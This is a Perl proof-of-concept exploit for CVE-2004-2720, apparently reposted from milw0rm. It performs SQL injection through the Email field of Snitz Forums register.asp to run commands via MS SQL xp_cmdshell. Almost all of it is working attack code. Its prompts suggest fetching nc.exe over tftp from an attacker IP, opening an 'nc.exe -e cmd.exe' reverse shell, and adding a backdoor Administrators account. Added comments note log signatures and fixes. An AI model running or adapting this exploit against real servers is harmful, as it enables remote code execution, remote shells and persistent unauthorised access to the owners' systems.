FlyFar

Snitz Forums 3.3.03 - Remote Command Execution - CVE-2004-2720

Jan 24th, 2024
#!/usr/bin/perl
# Proof-of-concept for CVE-2004-2720: SQL injection through the Email field
# of Snitz Forums 3.3.03 register.asp, chained into MS SQL Server's
# master..xp_cmdshell so the database host runs an attacker-supplied command.
# The script only builds and sends one HTTP POST; it never reads the reply.
# Defensive relevance: the request shape below (register.asp?mode=DoIt with
# "xp_cmdshell" in the form body) is what to look for in web-server logs, and
# the fix on the server side is parameterised queries plus a database account
# without the rights to run xp_cmdshell.
#
# NOTE(review): the script runs without `use strict` / `use warnings` and
# uses a bareword filehandle (FILEHANDLE); kept as the original author wrote it.

use Socket;

print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
print "You accept full responsibility for your actions by using this script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";

# Interactive parameters; each falls back to a hard-coded default when the
# user just presses enter. Input is not validated beyond the empty check.
print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
$webserver = "www.enterthegame.com";
}

print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
$port = 80;
}

print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
$path = "/forum/register.asp";
}

print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
# Only spaces are percent-encoded; no other form-encoding of the command is done.
$command =~ s/\ /\%20/g;

# NOTE(review): the connect target is the literal 80 here; $port is used only
# for the Host header below. `== undef` is a numeric compare against 0, which
# happens to work because open_TCP returns 1 on success and undef on failure
# (it would warn under `use warnings`).
if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
print "Error connecting to $webserver\n";
exit( 0 );
}
else
{
# Request target: register.asp?mode=DoIt, the form-submission branch.
my $data1 = $path . "\?mode\=DoIt";
# Injected form body. Percent-decoded it reads:
#   Email=' exec master..xp_cmdshell '<command>' --&Name=snitz
# The leading quote closes the string literal in the server-side SQL,
# xp_cmdshell runs <command>, and "--" comments out the rest of the statement.
# Detection: POST bodies to register.asp containing "xp_cmdshell" or "master..".
my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
my $length = length( $data2 );

# Hand-built HTTP/1.1 request. Header lines end in a bare "\n" rather than
# CRLF, and the blank line before the body is also LF-only -- distinctive in
# packet captures compared with browser-generated traffic.
print FILEHANDLE "POST $data1 HTTP/1.1\n";
if( $port == 80 )
{
print FILEHANDLE "Host: $webserver\n";
}
else
{
print FILEHANDLE "Host: $webserver:$port\n";
}
print FILEHANDLE "Accept: */*\n";
# The header value literally begins with a second "User-Agent: " prefix; the
# duplicated prefix is a usable fingerprint for this script in access logs.
print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
print FILEHANDLE "Keep-Alive: 300\n";
print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
print FILEHANDLE "Content-Length: $length\n\n";
print FILEHANDLE "$data2";

# Status text only: the HTTP response is never read, so the script cannot
# tell whether the injection actually ran.
print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
print "netcat, hit \"enter\" a couple of times to be safe.\n\n";

close( FILEHANDLE );
}
  75.  
# open_TCP($FS, $dest, $port)
# Opens a TCP connection to $dest:$port on the caller-supplied (bareword)
# filehandle $FS and switches that handle to autoflush.
# Returns 1 on success, undef if connect() fails.
# NOTE(review): socket() and inet_aton() are unchecked; an unresolvable
# $dest is not handled explicitly here.
sub open_TCP
{
my( $FS, $dest, $port ) = @_;

my $proto = getprotobyname( 'tcp' );
socket( $FS, PF_INET, SOCK_STREAM, $proto );
my $sin = sockaddr_in( $port, inet_aton( $dest ));
connect( $FS, $sin ) || return undef;

# Enable autoflush on $FS via the select/$|/select idiom, then restore the
# previous default output handle.
my $old_fh = select( $FS );
$| = 1;
select( $old_fh );
return 1;
}
  90.  
  91. # milw0rm.com [2003-05-12]
  92.            